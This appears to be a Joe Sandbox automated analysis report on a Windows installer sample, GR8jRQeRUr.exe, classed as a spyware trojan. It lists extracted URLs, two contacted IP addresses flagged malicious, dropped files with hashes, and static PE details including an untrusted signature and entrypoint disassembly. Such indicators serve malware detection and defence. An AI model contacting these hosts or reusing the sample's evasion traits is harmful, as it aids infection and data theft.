                                                                            https://api.ip.sb/ipGR8jRQeRUr.exe, 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeGR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://support.google.com/chrome/?p=plugin_quicktimeGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/scGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id9ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591029105.000000001E96F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590648971.000000001E7EA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590799521.000000001E8AE000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591267383.000000001EAB0000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591318944.000000001EAFB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583560791.000000001F89D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583621640.000000001F90F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591722392.000000001F7DA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583684692.000000001F980000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591648322.000000001F769000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://tempuri.org/Entity/Id20GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://tempuri.org/Entity/Id21GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://tempuri.org/Entity/Id22GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://tempuri.org/Entity/Id23GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://nsis.sf.net/NSIS_ErrorErrorGR8jRQeRUr.exefalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://tempuri.org/Entity/Id24GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://tempuri.org/Entity/Id24ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://tempuri.org/Entity/Id1ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://support.google.com/chrome/?p=plugin_shockwaveGR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://forms.reaGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id10GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id11GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id12GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id16ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id13GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id14GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id15GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id16GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/NonceGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id17GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id18GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id5ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id19GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
• URL Reputation: safe
Reputation: unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp
Malicious: false
Reputation: high

http://tempuri.org/Entity/Id10Response
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
Reputation: unknown

http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp
Malicious: false
Reputation: high

http://tempuri.org/Entity/Id8Response
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
Reputation: unknown

https://support.google.com/chrome/?p=plugin_wmp
Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp
Malicious: false
Reputation: high

http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp
Malicious: false
Reputation: high

http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp
Malicious: false
Reputation: high

http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp
Malicious: false
Reputation: high

https://support.google.com/chrome/answer/6258784
Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp
Malicious: false
Reputation: high

http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp
Malicious: false
Reputation: high

http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Contacted IPs

Public

IP              Domain   Country             ASN    ASN Name                  Malicious
185.112.83.8    unknown  Russian Federation  50113  SUPERSERVERSDATACENTERRU  true
194.26.229.202  unknown  Netherlands         1213   HEANETIE                  true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 541930
Start date: 18.12.2021
Start time: 08:24:06
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 49s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: GR8jRQeRUr (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/4@0/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 28.7% (good quality ratio 28.1%)
• Quality average: 88.4%
• Quality standard deviation: 21%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for sample files taking high CPU consumption
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 23.54.113.104
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time: 08:27:20
Type: API Interceptor
Description: 17x Sleep call for process: GR8jRQeRUr.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GR8jRQeRUr.exe.log
Process: C:\Users\user\Desktop\GR8jRQeRUr.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2291
Entropy (8bit): 5.3192079301865585
Encrypted: false
SSDEEP: 48:MIHKmfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHK1HxLHG1qHqH5HX:Pqaq5qXAqLqdqUqzcGYqhQnoPtIxHbqG
MD5: 2308F672881D77B53310A221B4D27E95
SHA1: 80371C7B5D415DC46F2BB4BA872B14AF0B0EED8B
SHA-256: 83D6F5E305A78D3EAB05CFB58D8595FECB2755E80978C6D6236AEF9186E65CDB
SHA-512: ECFBCDFAA24CEE02DFAD3175043FF4408F100E0867A66AE3AF14C2C7CB572E451C052A4D5FA452F6FB5C732C082DA7AB321F58CF65E37862E777EEF4DADDC652
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b

C:\Users\user\AppData\Local\Temp\a.txt
Process: C:\Users\user\Desktop\GR8jRQeRUr.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 23
Entropy (8bit): 2.2068570640942187
Encrypted: false
SSDEEP: 3:jNDBfN:jNVfN
MD5: 6C3AA179406696C66ACF8DC984ABC7DF
SHA1: 7F66AB35CA41A3449382F9DA68864D64EC182F28
SHA-256: 798DF5B3298985AE022F8C5A6714F7891EAA49B2E4B24E3A8B2329C04DD11C71
SHA-512: 7551B1FBE1CAEF52FD0AFC8601DCD0D6F013198FCC7CBF57F42EB090577B34B91E6F4ADCE1A76BC7FFD95559A3FDD529FE6DE90B8335EF8E901CBB606DDAE836
Malicious: false
Reputation: low
Preview: ghdfhjfghfgjfdghfghfgdh

C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll
Process: C:\Users\user\Desktop\GR8jRQeRUr.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 12288
Entropy (8bit): 5.814115788739565
Encrypted: false
SSDEEP: 192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5: CFF85C549D536F651D4FB8387F1976F2
SHA1: D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256: 8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512: 531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious: false
Antivirus:
• Antivirus: Virustotal, Detection: 2%
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Reputation: moderate, very likely benign file
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\scandinavians.dat
Process: C:\Users\user\Desktop\GR8jRQeRUr.exe
File Type: DOS executable (COM)
Category: dropped
Size (bytes): 47076
Entropy (8bit): 7.7331462076116155
Encrypted: false
SSDEEP: 768:qneRjGe0/k9YQxywdhTIve57M6GHawBvGZ0/z6ZPNb8xLWNLxIVtEm71amrVwyQb:WeRjs/Yxyoo+ZGHawBvGomlhuKLmVtEz
MD5: 278CC0FC489840159F50217B89BC6910
SHA1: D7FD2CAE331A3F6EFCD5A9EB287BA06D4FECD9B5
SHA-256: C2B2E9906FE79CCE8E2AA4EDD79DE576275A7F2163C781BB4A7209BDFCF3EF20
SHA-512: E423F1735F68970B39AC81D3E8D81C5F9CD308462908EB230C41F21229EE279AC64013F0534E4AEFE2630DB4D90506A19DBB8650FB994FB542FB2D4BE8DF96D9
Malicious: false
Reputation: low

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.5273933240536195
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: GR8jRQeRUr.exe
File size: 96104
MD5: 30a35b83c44aba13ee4ea4ee11003419
SHA1: abbb71291df7529f46f8d5896f1bb60e2a4afc21
SHA256: fee1019ba9c5d5229717f864c5dc8e1b49150b0c4db83f4a2c9b36d51eb03025
SHA512: 7db17648940923b8874cf53d790f4c3daccc429aeb3207276662286481a4dee6b967a1e94d2259b2f7753e34fdba04fda9e423056ead83024fa2cb5b7896420a
SSDEEP: 1536:K/T2X/jN2vxZz0DTHUpouMJbPxxE+1fHWUyRCEBaOoqhkG6owwDQCGgVOP:KbG7N2kDTHUpouMJbPxPfHryBa7JNVwk
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x40352d
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 56a78d55f3f7af51443e58e0ce2fb5f6

Authenticode Signature

Signature Valid: false
Signature Issuer: E=hanks@Adjudicata5.Sce, CN=RDVINSGLASSENES, OU=Marekanite, O=Blomsterkostes5, L=Ukunstnerisk7, S=Gudda9, C=PW
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After:
• 12/17/2021 3:51:51 AM, 12/17/2022 3:51:51 AM
Subject Chain:
• E=hanks@Adjudicata5.Sce, CN=RDVINSGLASSENES, OU=Marekanite, O=Blomsterkostes5, L=Ukunstnerisk7, S=Gudda9, C=PW
Version: 3
Thumbprint MD5: 28E577EE268CB0B7C99D6F9414F64A55
Thumbprint SHA-1: D574BF837B6A4CD7DAC81370347084233088AD42
Thumbprint SHA-256: 8425146360DCA3E16F58EC37F105AC01A88D202A6A89685C900BB42489277395
Serial: 00

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F738863234Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F738863231Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4c000 | 0xe48 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x162f8 | 0x1470 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6897 | 0x6a00 | False | 0.666126179245 | data | 6.45839821493 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x14a6 | 0x1600 | False | 0.439275568182 | data | 5.02410928126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2b018 | 0x600 | False | 0.521484375 | data | 4.15458210409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x36000 | 0x16000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x4c000 | 0xe48 | 0x1000 | False | 0.38916015625 | data | 4.02680822028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x4c208 | 0x2e8 | data | English | United States
RT_DIALOG | 0x4c4f0 | 0x100 | data | English | United States
RT_DIALOG | 0x4c5f0 | 0x11c | data | English | United States
RT_DIALOG | 0x4c710 | 0xc4 | data | English | United States
RT_DIALOG | 0x4c7d8 | 0x60 | data | English | United States
